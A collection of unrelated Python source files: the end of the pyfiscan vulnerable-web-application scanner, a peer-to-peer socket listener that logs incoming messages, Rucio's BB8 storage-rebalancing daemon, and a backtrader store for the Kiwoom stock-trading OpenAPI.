if post_process and not public_html_used:
try:
if issue['post_processing'][0] == 'php5.fcgi':
if not postprocess_php5fcgi(home_location, item_location):
break
except KeyError:
pass
# item_location is stripped from application location so that
# we get cleaner output and actual installation directory
install_dir = item_location[:item_location.find(location)]
# Calls result handler (goes to CSV and log)
handle_results(report, appname, file_version, install_dir, \
issue['cve'], issue['secure_version'])
else:
logging.debug('No version found from item: %s with regexp %s', \
item_location, issue['regexp'])
except Exception:
logging.error(traceback.format_exc())
report.close()
if __name__ == "__main__":
logfile = 'pyfiscan.log'
usage = """
Usage:
pyfiscan.py [--check-modes] [-p] [-l LEVEL] [-a NAME]
pyfiscan.py -r <directory> [-l LEVEL] [-a NAME]
pyfiscan.py --home <directory> [--check-modes] [-p] [-l LEVEL] [-a NAME]
pyfiscan.py --check <FILE>
pyfiscan.py --file <FILE> [-l LEVEL] [-a NAME]
pyfiscan.py [-h|--help]
pyfiscan.py --version
Options:
-r DIR Scans directories recursively.
-p Enable post process for php5.fcgi file checks.
--home DIR Specifies where the home-directories are located.
--check FILE Rechecks entries in old CSV files.
--file FILE Scan using list of filename/paths in FILE (e.g. locate output)
--check-modes Check using execution bit if we are allowed to traverse directories.
-l LEVEL Specifies logging level: info, debug.
-a NAME Scans only specific applications. Delimiter: ,
If you do not spesify recursive-option predefined directories are scanned, which are:
/home/user/sites/vhost/www
/home/user/sites/vhost/secure-www
/home/user/public_html
"""
arguments = docopt(usage, version='pyfiscan 0.9')
starttime = time.time() # used to measure program runtime
# If enabled only checks status using old result file
# Check argument must be handled first so that we don't open handle to
# logfile. Maybe we add some kind of logging to checker in the future
if arguments['--check']:
check_old_results(arguments['--check'])
sys.exit(1)
# Available logging levels, which are also hardcoded to usage
levels = {'info': logging.INFO, 'debug': logging.DEBUG}
if arguments['-l']:
level_name = arguments['-l']
else:
level_name = str('info')
if not level_name in levels:
print('No such log level. Available levels are: %s' % levels.keys())
sys.exit(1)
level = levels.get(level_name, logging.NOTSET)
# Post process is used for checking if file exists in installation
# directory. For example config files and PHP fcgi-file.
post_process = None
if arguments['-p']:
post_process = True
# Includes is used to scan only specific applications.
includes = None
if arguments['-a']:
includes = arguments['-a']
includes = includes.split(',')
# Exit in case logfile is symlink
if os.path.islink(logfile):
sys.exit('Logfile %s is a symlink. Exiting..' % logfile)
try:
logging.basicConfig(filename=logfile, level=level, format='%(asctime)s %(levelname)s %(funcName)s:%(lineno)d %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
os.chmod(logfile, 0600)
except IOError as (errno, strerror):
if errno == int('13'):
sys.exit('Error while writing to logfile: %s' % strerror)
try:
database = Database('yamls/', includes)
if len(database.issues) == 0:
sys.exit('Empty database. Exiting..')
# stderr to /dev/null
devnull_fd = open(os.devnull, "w")
sys.stderr = devnull_fd
log_to_stderr()
# Starts the asynchronous workers. Amount of workers is the same as cores in server.
# http://docs.python.org/library/multiprocessing.html#multiprocessing.pool.multiprocessing.Pool
logging.debug('Starting workers.')
pool = Pool()
pool.apply_async(Worker, [arguments['--home'], post_process])
# Starts the actual populator daemon to get possible locations, which will be verified by workers.
# http://docs.python.org/library/multiprocessing.html#multiprocessing.Process
p = PopulateScanQueue()
if arguments['-r']:
logging.debug('Scanning recursively from path: %s', arguments['-r'])
populator = Process(target=p.populate, args=([arguments['-r']],))
elif arguments['--home']:
logging.debug('Scanning predefined variables: %s', arguments['--home'])
populator = Process(target=p.populate_predefined, args=(arguments['--home'], arguments['--check-modes'],))
elif arguments['--file']:
logging.debug('Scanning using file: %s', arguments['--file'])
populator = Process(target=p.populate_filelist, args=([arguments['--file']],))
else:
logging.debug('Scanning predefined variables: /home')
populator = Process(target=p.populate_predefined, args=('/home', arguments['--check-modes'],))
populator.start()
# Prevents any more tasks from being submitted to the pool. Once all the tasks have been completed the worker processes exit using kill-signal None
# http://docs.python.org/library/multiprocessing.html#multiprocessing.pool.multiprocessing.Pool.close
populator.join()
pool.close()
pool.join()
runtime = time.time() - starttime
logging.info('Scanning ended, which took %s seconds', runtime)
except KeyboardInterrupt:
logging.info('Received keyboard interrupt. Exiting..')
pool.join()
populator.join()
print('Received keyboard interrupt. Exiting..')
runtime = time.time() - starttime
logging.info('Scanning ended, which took %s seconds', runtime)
print('Scanning ended, which took %s seconds', runtime)
except Exception:
logging.error(traceback.format_exc())
|
incoming_link.py
|
import threading
import logging
import os
import sys
from ..scanner_cogs import *
from .. scanner_cogs import get_ip
from .head_recv import *
local_net = []
lhost = get_ip.get_ip()
def p2p_welcomer(server):
"""[summary]
A function that takes incoming connections and transfers them to an incoming link. Can listen to the amount of current incoming link threads
plus 2.
Args:
server ([sock]): [description]
"""
while True:
#NOTE: This listen function is only supposed to be here until I figure out how to have the amount of server connections (+2)
server.listen(2)
incoming_link_path = "permanence_files\ip_messages\incoming_messages/"
if os.path.isfile(incoming_link_path):
dir_list = os.listdir(incoming_link_path)
print(f"THIS IS HOW MANY FILES ARE IN INCOMING_MESSAGES: {len(dir_list)}")
else:
dir_list = 0
logging.info(f"No files found in {incoming_link_path}", exc_info=True)
print(f"HOW MANY MESSAGES IN INCOMING: {dir_list}")
conn, addr = server.accept()
print(f"BOT_CONNECTED:{conn}, {addr}")
if conn:
if addr:
link_drone_thread = threading.Thread(target=link, args=(conn, addr))
link_drone_thread.name = "INCOMING_LINK"
link_drone_thread.start()
else:
logging.info(f"Failed to retrieve {conn} address.", exc_info=True)
try:
conn.shutdown(2)
except:
logging.error(f"Failed to shutdown connection {conn}", exc_info=True)
conn.close()
else:
try:
conn.shutdown(2)
except Exception as e:
logging.error(f"Failed to shutdown unknown connection", exc_info=True)
conn.close()
def shutdown_incoming_link(conn, file, err, addr):
"""[summary]
This function is a universal shutdown for an incoming link. Provides information of why the incoming link shut down in a summary message.
Args:
conn ([sock]): [A socket connection]
file ([TextIOWrapper]): [A file]
err ([Exception]): [The exception that caused the error. (If applicable)]
addr ([str]): [An IPv4 address, without the port number.]
"""
ip_message_file_name = addr + ".ipmessage"
ip_message_file_location = "./permanence_files/ip_messages/incoming_messages/"
ip_message_file_path = os.path.join(ip_message_file_location, ip_message_file_name)
if os.path.exists(ip_message_file_path):
try:
os.remove(ip_message_file_path)
except Exception as e:
logging.error(f"Failed to remove {ip_message_file_path} in shutdown_sequence for link {addr}", exc_info=True)
else:
logging.info(f"Failed to remove {ip_message_file_path} in shutdown_sequence for link {addr} because it does not exist.")
if conn:
try:
conn.shutdown(2)
except Exception as e:
logging.error(f"Could not shutdown incoming_link {addr}", exc_info=True)
conn.close()
if file:
if file == False:
print(f"(SHUTDOWN SEQUENCE MESSAGE) FILE TEXTIOWRAPPER NOT FOUND, NON-FATAL SHUTDOWN ERROR.")
elif file != False:
try:
file.close()
except Exception as e:
logging.critical(f"Could not close file {file} even though it exists.", exc_info=True)
if err:
if err != False:
if addr:
print(f"(SHUTDOWN SEQUENCE MESSAGE) THE EXCEPTION {err} OCCURRED AT {addr}. CONNECTION FATAL.")
else:
print(f"(SHUTDOWN SEQUENCE MESSAGE) THE EXCEPTION {err} OCCURRED AT {conn}. CONNECTION FATAL. EXAMINE CONNECTION FOR ADDRESS, ADDRESS NOT AVAILABLE.")
elif err == False:
if addr:
print(f"(SHUTDOWN SEQUENCE MESSAGE) SHUTTING DOWN INCOMING LINK CONNECTION WITH {addr} FOR UNPROVIDED REASON.")
else:
print(f"(SHUTDOWN SEQUENCE MESSAGE) SHUTTING DOWN AN INCOMING LINK FOR AN UNPROVIDED REASON. ADDRESS NOT AVAILABLE, EXAMINE CONNECTION: {conn}")
else:
if addr:
print(f"(SHUTDOWN SEQUENCE MESSAGE) EXAMINE CODE IN INCOMING LINK, GOT RESPONSE {err} from {addr}")
else:
print(f"(SHUTDOWN SEQUENCE MESSAGE) EXAMINE CODE IN INCOMING LINK, GOT RESPONSE {err} FROM UNKNOWN INCOMING LINK, EXAMINE CONNECTION: {conn}")
sys.exit()
def link(conn, addr):
"""[summary]
The incoming_link is the receiving end of an outcoming link from another bot.
Args:
conn ([socket]): [A socket connection (in the role of a server)]
addr ([str]): [An IPv4 address, without the port number.]
"""
file = False
addr = str(addr)
ip_message_file_name = addr + ".ipmessage"
ip_message_file_location = "./permanence_files/ip_messages/incoming_messages/"
ip_message_file_path = os.path.join(ip_message_file_location, ip_message_file_name)
if os.path.isdir(ip_message_file_path):
try:
os.remove(ip_message_file_path)
except Exception as e:
logging.critical(f"Could not remove a previous version of .ipmessage file from incoming_link {addr}, even though the previous file exists. Shutting down incoming_link.", exc_info=True)
shutdown_incoming_link(conn, False, e, addr)
if not os.path.isdir(ip_message_file_path):
try:
os.makedirs(ip_message_file_location, exist_ok=True)
except Exception as e:
logging.critical(f"Could not create {ip_message_file_location} for incoming_link {addr}, even though the file does not exist. Shutting down incoming_link", exc_info=True)
shutdown_incoming_link(conn, False, e, addr)
print("STARTED INCOMING LINK")
disconnection_counter = 0
waiting_for_info = True
conn.settimeout(5)
while waiting_for_info == True:
net_link = head_recv(conn, addr)
if net_link:
if net_link == "DRONE_IDLE":
conn.settimeout(None)
else:
conn.settimeout(5)
if type(net_link) == type([]):
if net_link[1] == "LOCAL_ERROR":
if net_link[0] == "FATAL_CONNECTION_ERROR":
logging.critical(f"Encountered fatal connection error in incoming_link {addr} , for more details, check the appropriate head_recv log file.", exc_info=True)
shutdown_incoming_link(conn, file, "", addr)
else:
print(f"LOCAL_ERROR: {net_link[0]} experienced. Non-fatal.")
if net_link[1] == "SECURITY_ALERT":
print(f"SECURITY_ALERT: {net_link[0]} experienced. Non-fatal.")
try:
file = open(ip_message_file_path, "r")
except Exception as e:
logging.info(f"Could not open or read {ip_message_file_path} in incoming_link {addr}", exc_info=True)
try:
file = open(ip_message_file_path, "x")
except Exception.error as e:
logging.critical(f"Could not create the file {ip_message_file_path} in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
finally:
try:
file = open(ip_message_file_path, "a+")
except Exception as e:
logging.critical(f"Could not open {ip_message_file_path} in append+ mode in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
if net_link == "DRONE_IDLE":
pass
else:
if type(net_link) != type([]):
net_link = str(net_link)
try:
file.write(net_link)
except:
try:
file = open(ip_message_file_path, "a+")
file.write(net_link)
except Exception as e:
logging.critical(f"Could not open {ip_message_file_path} in append+ mode, or could not write to {ip_message_file_path} in append+ mode in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
file.write("\n")
file.close()
elif not net_link:
disconnection_counter += 1
if disconnection_counter == 5:
try:
conn.sendall(bytes("conn_test", "utf-8"))
disconnection_counter = 0
except Exception as err:
print("INCOMING_LINK_DISCONNECTED")
try:
conn.shutdown(2)
except Exception as e:
logging.critical(f"Could not shutdown connection {conn} in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
finally:
logging.critical(f"Outgoing link {conn} disconnected from incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, err, addr)
|
bb8.py
|
# -*- coding: utf-8 -*-
# Copyright CERN since 2016
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
BB8 is a daemon the re-balance data between RSEs.
"""
import logging
import socket
import threading
import time
import os
from sqlalchemy import func, or_, and_
from rucio.db.sqla.session import read_session
from rucio.db.sqla import models
from rucio.db.sqla.constants import RuleState, LockState
from rucio.common.exception import InvalidRSEExpression
from rucio.common.logging import formatted_logger, setup_logging
from rucio.core import config as config_core
from rucio.core.rse_expression_parser import parse_expression
from rucio.core.heartbeat import live, die, sanity_check, list_payload_counts
from rucio.core.rse import get_rse_usage
from rucio.daemons.bb8.common import rebalance_rse
GRACEFUL_STOP = threading.Event()
def rule_rebalancer(rse_expression, move_subscriptions=False, use_dump=False, sleep_time=300, once=True, dry_run=False):
"""
Main loop to rebalancer rules automatically
"""
total_rebalance_volume = 0
executable = 'rucio-bb8'
hostname = socket.gethostname()
pid = os.getpid()
hb_thread = threading.current_thread()
heart_beat = live(executable, hostname, pid, hb_thread)
prepend_str = 'bb8[%i/%i] ' % (heart_beat['assign_thread'], heart_beat['nr_threads'])
logger = formatted_logger(logging.log, prepend_str + '%s')
logger(logging.DEBUG, 'rse_expression: %s', rse_expression)
logger(logging.INFO, 'BB8 started')
while not GRACEFUL_STOP.is_set():
logger(logging.INFO, 'Starting new cycle')
heart_beat = live(executable, hostname, pid, hb_thread)
start_time = time.time()
total_rebalance_volume = 0
tolerance = config_core.get('bb8', 'tolerance', default=0.05)
max_total_rebalance_volume = config_core.get('bb8', 'max_total_rebalance_volume', default=10 * 1E12)
max_rse_rebalance_volume = config_core.get('bb8', 'max_rse_rebalance_volume', default=500 * 1E9)
min_total = config_core.get('bb8', 'min_total', default=20 * 1E9)
payload_cnt = list_payload_counts(executable, older_than=600, hash_executable=None, session=None)
if rse_expression in payload_cnt:
logger(logging.WARNING, 'One BB8 instance already running with the same RSE expression. Stopping')
break
else:
# List the RSEs represented by rse_expression
try:
rses = [rse for rse in parse_expression(rse_expression)]
list_rses2 = [rse['rse'] for rse in rses]
except InvalidRSEExpression as err:
logger(logging.ERROR, err)
break
# List the RSEs represented by all the RSE expressions stored in heartbeat payload
list_rses1 = []
for rse_exp in payload_cnt:
if rse_exp:
list_rses1 = [rse['rse'] for rse in parse_expression(rse_exp)]
for rse in list_rses2:
if rse in list_rses1:
logger(logging.WARNING, 'Overlapping RSE expressions %s vs %s. Stopping', rse_exp, rse_expression)
break
logger(logging.INFO, 'Will process rebalancing on %s', rse_expression)
heart_beat = live(executable, hostname, pid, hb_thread, older_than=max(600, sleep_time), hash_executable=None, payload=rse_expression, session=None)
total_primary = 0
total_secondary = 0
total_total = 0
global_ratio = float(0)
for rse in rses:
logger(logging.DEBUG, 'Getting RSE usage on %s', rse['rse'])
rse_usage = get_rse_usage(rse_id=rse['id'])
usage_dict = {}
for item in rse_usage:
# TODO Check last update
usage_dict[item['source']] = {'used': item['used'], 'free': item['free'], 'total': item['total']}
try:
rse['primary'] = usage_dict['rucio']['used'] - usage_dict['expired']['used']
rse['secondary'] = usage_dict['expired']['used']
rse['total'] = usage_dict['storage']['total'] - usage_dict['min_free_space']['used']
rse['ratio'] = float(rse['primary']) / float(rse['total'])
except KeyError as err:
logger(logging.ERROR, 'Missing source usage %s for RSE %s. Exiting', err, rse['rse'])
break
total_primary += rse['primary']
total_secondary += rse['secondary']
total_total += float(rse['total'])
rse['receive_volume'] = 0 # Already rebalanced volume in this run
global_ratio = float(total_primary) / float(total_total)
logger(logging.INFO, 'Global ratio: %f' % (global_ratio))
for rse in sorted(rses, key=lambda k: k['ratio']):
logger(logging.INFO, '%s Sec/Prim local ratio (%f) vs global %s', rse['rse'], rse['ratio'], global_ratio)
rses_over_ratio = sorted([rse for rse in rses if rse['ratio'] > global_ratio + global_ratio * tolerance], key=lambda k: k['ratio'], reverse=True)
rses_under_ratio = sorted([rse for rse in rses if rse['ratio'] < global_ratio - global_ratio * tolerance], key=lambda k: k['ratio'], reverse=False)
# Excluding RSEs
logger(logging.DEBUG, 'Excluding RSEs as destination which are too small by size:')
for des in rses_under_ratio:
if des['total'] < min_total:
logger(logging.DEBUG, 'Excluding %s', des['rse'])
rses_under_ratio.remove(des)
logger(logging.DEBUG, 'Excluding RSEs as sources which are too small by size:')
for src in rses_over_ratio:
if src['total'] < min_total:
logger(logging.DEBUG, 'Excluding %s', src['rse'])
rses_over_ratio.remove(src)
logger(logging.DEBUG, 'Excluding RSEs as destinations which are not available for write:')
for des in rses_under_ratio:
if des['availability'] & 2 == 0:
logger(logging.DEBUG, 'Excluding %s', des['rse'])
rses_under_ratio.remove(des)
logger(logging.DEBUG, 'Excluding RSEs as sources which are not available for read:')
for src in rses_over_ratio:
if src['availability'] & 4 == 0:
logger(logging.DEBUG, 'Excluding %s', src['rse'])
rses_over_ratio.remove(src)
# Gets the number of active transfers per location
dict_locks = get_active_locks(session=None)
# Loop over RSEs over the ratio
for index, source_rse in enumerate(rses_over_ratio):
# The volume that would be rebalanced, not real availability of the data:
available_source_rebalance_volume = int((source_rse['primary'] - global_ratio * source_rse['secondary']) / (global_ratio + 1))
if available_source_rebalance_volume > max_rse_rebalance_volume:
available_source_rebalance_volume = max_rse_rebalance_volume
if available_source_rebalance_volume > max_total_rebalance_volume - total_rebalance_volume:
available_source_rebalance_volume = max_total_rebalance_volume - total_rebalance_volume
# Select a target:
for destination_rse in rses_under_ratio:
if available_source_rebalance_volume > 0:
vo_str = ' on VO {}'.format(destination_rse['vo']) if destination_rse['vo'] != 'def' else ''
if index == 0 and destination_rse['id'] in dict_locks:
replicating_volume = dict_locks[destination_rse['id']]['bytes']
logger(logging.DEBUG, 'Already %f TB replicating to %s%s', replicating_volume / 1E12, destination_rse['rse'], vo_str)
destination_rse['receive_volume'] += replicating_volume
if destination_rse['receive_volume'] >= max_rse_rebalance_volume:
continue
available_target_rebalance_volume = max_rse_rebalance_volume - destination_rse['receive_volume']
if available_target_rebalance_volume >= available_source_rebalance_volume:
available_target_rebalance_volume = available_source_rebalance_volume
logger(logging.INFO, 'Rebalance %d TB from %s(%f) to %s(%f)%s', available_target_rebalance_volume / 1E12, source_rse['rse'], source_rse['ratio'], destination_rse['rse'], destination_rse['ratio'], vo_str)
expr = destination_rse['rse']
rebalance_rse(rse_id=source_rse['id'], max_bytes=available_target_rebalance_volume, dry_run=dry_run, comment='Background rebalancing', force_expression=expr, logger=logger)
destination_rse['receive_volume'] += available_target_rebalance_volume
total_rebalance_volume += available_target_rebalance_volume
available_source_rebalance_volume -= available_target_rebalance_volume
if once:
break
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %f seconds', sleep_time - time_diff)
GRACEFUL_STOP.wait(sleep_time - time_diff)
die(executable='rucio-bb8', hostname=hostname, pid=pid, thread=hb_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(once, rse_expression, move_subscriptions=False, use_dump=False, sleep_time=300, threads=1, dry_run=False):
"""
Starts up the BB8 rebalancing threads.
"""
setup_logging()
hostname = socket.gethostname()
sanity_check(executable='rucio-bb8', hostname=hostname)
if once:
rule_rebalancer(rse_expression=rse_expression, move_subscriptions=move_subscriptions, use_dump=use_dump, once=once)
else:
logging.info('BB8 starting %s threads', str(threads))
threads = [threading.Thread(target=rule_rebalancer, kwargs={'once': once, 'rse_expression': rse_expression, 'sleep_time': sleep_time, 'dry_run': dry_run}) for _ in range(0, threads)]
[thread.start() for thread in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[thread.join(timeout=3.14) for thread in threads]
@read_session
def get_active_locks(session=None):
locks_dict = {}
rule_ids = session.query(models.ReplicationRule.id).filter(or_(models.ReplicationRule.state == RuleState.REPLICATING, models.ReplicationRule.state == RuleState.STUCK),
models.ReplicationRule.comments == 'Background rebalancing').all()
for row in rule_ids:
rule_id = row[0]
query = session.query(func.count(), func.sum(models.ReplicaLock.bytes), models.ReplicaLock.state, models.ReplicaLock.rse_id).\
filter(and_(models.ReplicaLock.rule_id == rule_id, models.ReplicaLock.state != LockState.OK)).group_by(models.ReplicaLock.state, models.ReplicaLock.rse_id)
for lock in query.all():
cnt, size, _, rse_id = lock
if rse_id not in locks_dict:
locks_dict[rse_id] = {'bytes': 0, 'locks': 0}
locks_dict[rse_id]['locks'] += cnt
locks_dict[rse_id]['bytes'] += size
return locks_dict
|
KiwoomOpenApiStore.py
|
# pylint: disable=no-member
import time
import datetime
import threading
import collections
import backtrader as bt
import pytz
from backtrader import TimeFrame
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import queue, with_metaclass
from koapy.context.KiwoomOpenApiContext import KiwoomOpenApiContext
from koapy.openapi.KiwoomOpenApiError import KiwoomOpenApiError
from koapy.backtrader.KiwoomOpenApiEventStreamer import KiwoomOpenApiEventStreamer
class KiwoomOpenApiJsonError(KiwoomOpenApiError):
def __init__(self, code, message=None):
if isinstance(code, KiwoomOpenApiError):
err = code
code = err.code
message = err.message
super().__init__(code, message)
@property
def error_response(self, description=None):
response = {
'code': self.code,
'message': self.message,
'description': description or '',
}
return response
class KiwoomOpenApiTimeFrameError(KiwoomOpenApiJsonError):
def __init__(self):
super().__init__(code=597, message='Not supported TimeFrame')
class HistoricalPriceRecord(collections.namedtuple('HistoricalPriceRecord', ['time', 'open', 'high', 'low', 'close', 'volume'])):
__slots__ = ()
kst = pytz.timezone('Asia/Seoul')
@classmethod
def from_tuple(cls, tup):
if '일자' in tup._fields:
dt = datetime.datetime.strptime(tup.일자, '%Y%m%d')
dt = cls.kst.localize(dt)
time = dt.timestamp() * (10 ** 6) # pylint: disable=redefined-outer-name
elif '체결시간' in tup._fields:
dt = datetime.datetime.strptime(tup.체결시간, '%Y%m%d%H%M%S')
dt = cls.kst.localize(dt)
time = dt.timestamp() * (10 ** 6)
else:
raise KiwoomOpenApiError('Cannot specify time')
open = abs(float(tup.시가)) # pylint: disable=redefined-builtin
high = abs(float(tup.고가))
low = abs(float(tup.저가))
close = abs(float(tup.현재가))
volume = abs(float(tup.거래량))
return cls(time, open, high, low, close, volume)
@classmethod
def records_from_dataframe(cls, df):
return [cls.from_tuple(tup) for tup in df[::-1].itertuples()]
@classmethod
def dict_records_from_dataframe(cls, df):
return [msg._asdict() for msg in cls.records_from_dataframe(df)]
class API:
# 우선은 최대한 기존 Oanda 구현을 유지한채로 맞춰서 동작할 수 있도록 구현해놓고
# 추후 동작이 되는게 확인되면 천천히 하단 API 에 맞게 최적화를 하는 방향으로 작업하는 것으로...
def __init__(self, context):
self._context = context
def __getattr__(self, name):
return getattr(self._context, name)
def get_instruments(self, account, instruments): # TODO: 계좌에 따라 시장이 다를 수 있음
instruments = self.GetStockInfoAsDataFrame(instruments)
instruments = [tup._asdict() for tup in instruments.itertuples(index=False)]
response = {'instruments': instruments}
return response
def get_history(self, trcode, inputs, dtbegin=None, dtend=None):
if trcode == 'opt10079':
code = inputs['종목코드']
interval = inputs['틱범위']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetTickStockDataAsDataFrame(code, interval, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10080':
code = inputs['종목코드']
interval = inputs['틱범위']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetMinuteStockDataAsDataFrame(code, interval, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10081':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetDailyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10082':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetWeeklyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10083':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetMonthlyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10094':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetYearlyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
else:
raise KiwoomOpenApiError('Unexpected trcode %s' % trcode)
candles = HistoricalPriceRecord.dict_records_from_dataframe(df)
response = {'candles': candles}
return response
def get_positions(self, account):
_summary, foreach = self.GetAccountEvaluationStatusAsSeriesAndDataFrame(account)
positions = [{
'instrument': tup.종목코드,
'side': 'buy',
'units': float(tup.보유수량),
'avgPrice': float(tup.매입금액) / float(tup.보유수량),
} for tup in foreach.itertuples()]
response = {'positions': positions}
return response
def get_account(self, account):
deposit = self.GetDepositInfo(account)
summary, _foreach = self.GetAccountEvaluationStatusAsSeriesAndDataFrame(account)
response = {
'marginAvail': float(deposit['주문가능금액']),
'balance': float(summary['유가잔고평가액']),
}
return response
def create_order(self, account, **kwargs):
# TODO: Implement
raise NotImplementedError
response = {}
return response
def close_order(self, account, oid):
# TODO: Implement
raise NotImplementedError
response = {}
return response
class MetaSingleton(MetaParams):
def __init__(cls, name, bases, dct):
super().__init__(name, bases, dct)
cls._singleton = None
def __call__(cls, *args, **kwargs):
if cls._singleton is None:
cls._singleton = super().__call__(*args, **kwargs)
return cls._singleton
class KiwoomOpenApiStore(with_metaclass(MetaSingleton, object)):
BrokerCls = None # broker class will auto register
DataCls = None # data class will auto register
params = (
('account', ''),
('account_tmout', 10.0),
)
@classmethod
def getdata(cls, *args, **kwargs):
if cls.DataCls is None:
from koapy.backtrader.KiwoomOpenApiData import KiwoomOpenApiData
cls.DataCls = KiwoomOpenApiData
return cls.DataCls(*args, **kwargs) # pylint: disable=not-callable
@classmethod
def getbroker(cls, *args, **kwargs):
if cls.BrokerCls is None:
from koapy.backtrader.KiwoomOpenApiBroker import KiwoomOpenApiBroker
cls.BrokerCls = KiwoomOpenApiBroker
return cls.BrokerCls(*args, **kwargs) # pylint: disable=not-callable
def __init__(self, context=None):
super().__init__()
self.notifs = collections.deque()
self._env = None
self.broker = None
self.datas = list()
if context is None:
context = KiwoomOpenApiContext()
self._context = context
self._context.EnsureConnected()
self.context = API(self._context)
self._cash = 0.0
self._value = 0.0
self._evt_acct = threading.Event()
self.q_account = None
self.q_ordercreate = None
self.q_orderclose = None
def start(self, data=None, broker=None):
if data is None and broker is None:
return
if data is not None:
self._env = data._env # pylint: disable=protected-access
self.datas.append(data)
if self.broker is not None:
self.broker.data_started(data)
elif broker is not None:
self.broker = broker
self.streaming_events()
self.broker_threads()
def stop(self):
pass
def put_notification(self, msg, *args, **kwargs):
self.notifs.append((msg, args, kwargs))
def get_notifications(self):
self.notifs.append(None)
return [x for x in iter(self.notifs.popleft, None)]
_GRANULARITIES = {
(TimeFrame.Ticks, 1): ('opt10079', {'종목코드': '', '틱범위': '1', '수정주가구분': '1'}),
(TimeFrame.Ticks, 3): ('opt10079', {'종목코드': '', '틱범위': '3', '수정주가구분': '1'}),
(TimeFrame.Ticks, 5): ('opt10079', {'종목코드': '', '틱범위': '5', '수정주가구분': '1'}),
(TimeFrame.Ticks, 10): ('opt10079', {'종목코드': '', '틱범위': '10', '수정주가구분': '1'}),
(TimeFrame.Ticks, 30): ('opt10079', {'종목코드': '', '틱범위': '30', '수정주가구분': '1'}),
(TimeFrame.Minutes, 1): ('opt10080', {'종목코드': '', '틱범위': '1', '수정주가구분': '1'}),
(TimeFrame.Minutes, 3): ('opt10080', {'종목코드': '', '틱범위': '3', '수정주가구분': '1'}),
(TimeFrame.Minutes, 5): ('opt10080', {'종목코드': '', '틱범위': '5', '수정주가구분': '1'}),
(TimeFrame.Minutes, 10): ('opt10080', {'종목코드': '', '틱범위': '10', '수정주가구분': '1'}),
(TimeFrame.Minutes, 15): ('opt10080', {'종목코드': '', '틱범위': '15', '수정주가구분': '1'}),
(TimeFrame.Minutes, 30): ('opt10080', {'종목코드': '', '틱범위': '30', '수정주가구분': '1'}),
(TimeFrame.Minutes, 45): ('opt10080', {'종목코드': '', '틱범위': '45', '수정주가구분': '1'}),
(TimeFrame.Minutes, 60): ('opt10080', {'종목코드': '', '틱범위': '60', '수정주가구분': '1'}),
(TimeFrame.Days, 1): ('opt10081', {'종목코드': '', '기준일자': '', '수정주가구분': '1'}),
(TimeFrame.Weeks, 1): ('opt10082', {'종목코드': '', '기준일자': '', '끝일자': '', '수정주가구분': '1'}),
(TimeFrame.Months, 1): ('opt10083', {'종목코드': '', '기준일자': '', '끝일자': '', '수정주가구분': '1'}),
(TimeFrame.Years, 1): ('opt10094', {'종목코드': '', '기준일자': '', '끝일자': '', '수정주가구분': '1'}),
}
def get_granularity(self, timeframe, compression, default=None):
return self._GRANULARITIES.get((timeframe, compression), default)
def get_instrument(self, dataname):
try:
insts = self.context.get_instruments(self.p.account, instruments=dataname)
except KiwoomOpenApiError:
return None
i = insts.get('instruments', [{}])
return i[0] or None
def streaming_events(self, tmout=None):
q = queue.Queue()
kwargs = {'q': q, 'tmout': tmout}
t = threading.Thread(target=self._t_streaming_listener, kwargs=kwargs)
t.daemon = True
t.start()
t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _t_streaming_listener(self, q, tmout=None):
while True:
trans = q.get()
self._transaction(trans)
def _t_streaming_events(self, q, tmout=None):
if tmout is not None:
time.sleep(tmout)
streamer = KiwoomOpenApiEventStreamer(self.context, q)
streamer.events()
def candles(self, dataname, dtbegin, dtend, timeframe, compression): # pylint: disable=unused-argument
kwargs = locals().copy()
kwargs.pop('self')
kwargs['q'] = q = queue.Queue()
t = threading.Thread(target=self._t_candles, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression, q):
trcode, inputs = self.get_granularity(timeframe, compression, (None, None))
if trcode is None:
e = KiwoomOpenApiTimeFrameError()
q.put(e.error_response)
return
inputs = inputs.copy()
inputs['종목코드'] = dataname
if dtbegin is not None:
if '끝일자' in inputs:
inputs['끝일자'] = dtbegin.strftime('%Y%m%d')
if dtend is not None:
if '기준일자' in inputs:
inputs['기준일자'] = dtend.strftime('%Y%m%d')
try:
response = self.context.get_history(trcode, inputs, dtbegin, dtend)
except KiwoomOpenApiError as e:
q.put(KiwoomOpenApiJsonError(e).error_response)
q.put(None)
return
for candle in response.get('candles', []):
q.put(candle)
q.put({})
def streaming_prices(self, dataname, tmout=None):
q = queue.Queue()
